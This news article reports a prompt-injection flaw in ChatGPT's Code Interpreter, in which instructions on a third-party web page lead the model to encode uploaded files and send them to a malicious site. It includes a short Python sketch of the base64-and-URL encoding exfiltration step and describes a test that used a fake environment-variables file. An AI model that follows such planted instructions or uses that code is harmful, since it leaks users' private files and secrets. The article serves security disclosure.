ChatGPT has a scary security risk after new update. Is your data in trouble?

The introduction of file uploading in ChatGPT Plus is creating some unfortunate security problems.
By Chance Townsend
Credit: Mashable / Bob Al-Greene

Thanks to new ChatGPT updates like the Code Interpreter, OpenAI's popular generative AI tool now comes with fresh security concerns. According to research from security expert Johann Rehberger (and follow-up testing from Tom's Hardware), ChatGPT has glaring security flaws that stem from its new file-upload feature.

OpenAI's recent update to ChatGPT Plus added a myriad of new features, including DALL-E image generation and the Code Interpreter, which allows Python code execution and file analysis. The code is created and run in a sandbox environment that is unfortunately vulnerable to prompt injection attacks.

The attack, a known vulnerability in ChatGPT for some time now, involves tricking ChatGPT into executing instructions from a third-party URL, leading it to encode uploaded files into a URL-friendly string and send this data to a malicious website. While such an attack requires specific conditions (e.g., the user must actively paste a malicious URL into ChatGPT), the risk remains concerning. The threat could be realized through various scenarios, including a trusted website being compromised with a malicious prompt, or through social engineering tactics.
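To see why "URL-friendly string" matters here, consider a minimal sketch of the encoding step the research describes. This is an illustration of the general technique, not the researchers' actual code; the function name and the `attacker.example` domain are invented for the example.

```python
import base64
from urllib.parse import quote


def build_exfil_url(path: str, attacker_url: str) -> str:
    """Pack a file's contents into a URL query string, the way a
    malicious prompt could instruct a sandboxed interpreter to."""
    with open(path, "rb") as f:
        data = f.read()
    # Base64-encode the raw bytes, then percent-encode the result so
    # the whole payload survives as part of a URL.
    payload = quote(base64.b64encode(data).decode("ascii"))
    return f"{attacker_url}?data={payload}"
```

Anything the sandbox can read, from uploaded documents to configuration files, can be flattened into a string like this and smuggled out in what looks like an ordinary web request.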


Tom's Hardware did some impressive work testing just how vulnerable users may be to this attack. The exploit was tested by creating a fake environment variables file and using ChatGPT to process and inadvertently send this data to an external server. Although the exploit's effectiveness varied across sessions (e.g., ChatGPT sometimes refused to load external pages or transmit file data), it raises significant security concerns, especially given the AI's ability to read and execute Linux commands and handle user-uploaded files in a Linux-based virtual environment.
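The fake environment variables file in that test would look something like the sketch below. The variable names and values here are invented placeholders, not those used by Tom's Hardware; the point is that the decoy contains distinctive markers a researcher can later spot in traffic reaching a server they control.

```python
# Write a decoy .env-style file with obviously fake credentials.
# None of these names or values come from the original test.
decoy = "\n".join([
    "API_KEY=FAKE-0000-0000",
    "DB_PASSWORD=placeholder-only",
    "AWS_SECRET_ACCESS_KEY=NOT-A-REAL-SECRET",
])
with open("fake.env", "w") as f:
    f.write(decoy)
```

Uploading a file like this and then watching for those markers in incoming requests is a safe way to confirm exfiltration without risking real secrets.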

As Tom's Hardware notes in its findings, the exploit may seem unlikely in practice, but the existence of this security loophole is significant. ChatGPT should ideally not execute instructions from external web pages, yet it does. Mashable reached out to OpenAI for comment, but it did not immediately respond to our request.

Chance Townsend
Assistant Editor, General Assignments

Currently residing in Austin, Texas, Chance Townsend is an Assistant Editor at Mashable. He has a Master's in Journalism from the University of North Texas, with research focused primarily on online communities, dating apps, and professional wrestling.

In his free time, he's an avid cook, loves to sleep, and "enjoys" watching the Lions and Pistons break his heart on a weekly basis. If you have any stories or recipes that might be of interest you can reach him by email at [email protected].

